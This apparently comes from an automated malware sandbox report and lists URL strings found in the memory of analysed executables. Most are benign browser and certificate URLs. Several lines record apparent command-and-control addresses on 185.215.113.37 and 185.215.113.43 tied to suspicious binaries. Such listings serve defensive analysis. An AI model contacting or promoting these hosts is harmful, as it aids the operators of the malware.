Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php%
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php1
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1690398993.000000000117A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpN
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpWindows
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1690398993.000000000117A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpwq
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1690398993.000000000117A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpz
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/ntdesk
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1690398993.000000000117A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37/ws
Source: bd214fbd32.exe, 0000000E.00000002.1927559885.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.37t
Source: skotes.exe, 00000007.00000003.2253149939.0000000000F23000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E65000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001D.00000002.2128083032.000001C96307D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001D.00000002.2192132128.000001C968703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2167562247.000001C967798000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2277444887.000001C96F00D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2194286820.000001C968803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2199273661.000001C968A49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2194286820.000001C96883C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2045805918.000001C968A49000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2192132128.000001C96878E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001D.00000002.2232898347.000001C96928C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2144220840.000001C964800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2192132128.000001C96875C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2194286820.000001C96884F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2167562247.000001C9677D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2264780674.000001C96AB38000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96404F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001D.00000002.2192132128.000001C968703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2144220840.000001C964800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2194286820.000001C96881B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2264780674.000001C96AB78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001D.00000002.2192132128.000001C968703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2144220840.000001C964800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2300171636.000001C96F516000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C967469000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
Source: firefox.exe, 0000001D.00000002.2231391137.000001C969052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2157086315.000001C967469000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2231391137.000001C9690E6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F786000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#http://json-schema.org/draft-06/schema#http://json-schema.org
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F786000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#
Source: firefox.exe, 0000001D.00000003.2084605460.000001C9686D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2191911363.000001C9686E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.o
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2303891585.000001C96F786000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2096194447.000001C96767B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appId
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appName
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appNamehttp://mozilla.org/#/properties/userFacingNamehttp://mozilla.
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/featureId
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value(browserSe
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value/additiona
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/featurehttp://mozilla.org/#/proper
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/slug
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/slugLoginStore.prototype._dataPost
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabled
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabledOptional
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureId
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureIdRollou
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value/additiona
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/featurehttp://mozilla.org/#/proper
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/featureI
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value/ad
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/valuehtt
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemshttp://mozilla.org/#
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slug
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/featureI
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/itemshttp://mozilla.org/#
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratio
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/slug
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2http://mozilla.org/#/properties/targeting
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/brancheshttp://mozilla.org/#/properties/branches/anyOf/2http://mozil
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/count
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/namespace
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnit
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnithttp://mozilla.org/#/proper
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/start
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/total
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/totalhttp://mozilla.org/#/properties/userFac
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/channel
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/disableGreaseOnFallback
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxAnyPriorityThreads
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/dnsMaxPriorityThreads
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/ehPreconnectEnabled
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureIds
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureIds/itemshttp://mozilla.org/#/properties/branches/anyOf/0http
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureIdsdisabled_shims.GooglePublisherTags
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/greasePaddingSize
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/id
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isEnrollmentPaused
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isRollout
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isRollouthttp://mozilla.org/#/properties/bucketConfigUnique
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalPropertiesfiref
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/priority
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slug
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slughttp://mozilla.org/#/properties/grease
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomeshttp://mozilla.org/#/properties/outcomes/items
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/proposedDurationhttp://mozilla.org/#/properties/referenceBranch
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/schemaVersion
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/schemaVersionhttp://mozilla.org/#/properties/id
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/slug
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/startDate
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
Source: firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingName
Source: firefox.exe, 0000001D.00000003.2110816799.000001C967DEA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2149649708.000001C966C3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2078602546.000001C96899D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2138617954.000001C96401F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2146450702.000001C9657BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2068314432.000001C967DC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2090715671.000001C96F110000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2005986448.000001C9672F9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2045805918.000001C968A7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2078602546.000001C96898B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2074916361.000001C96891C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2267577999.000001C96AC03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2150615780.000001C966D03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2110816799.000001C967DC7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2045805918.000001C968A3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2085636271.000001C968969000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2257955106.000001C96A69A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2087507345.000001C968991000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2236916533.000001C9694CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2078602546.000001C96891F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2044345773.000001C96958B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.1459295281.0000000005A8D000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2045733905.00000000059E6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2168882791.000001C967927000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001D.00000002.2128083032.000001C96307D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F22D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 0000001D.00000002.2286214238.000001C96F22D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2257955106.000001C96A673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2257955106.000001C96A6AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agre
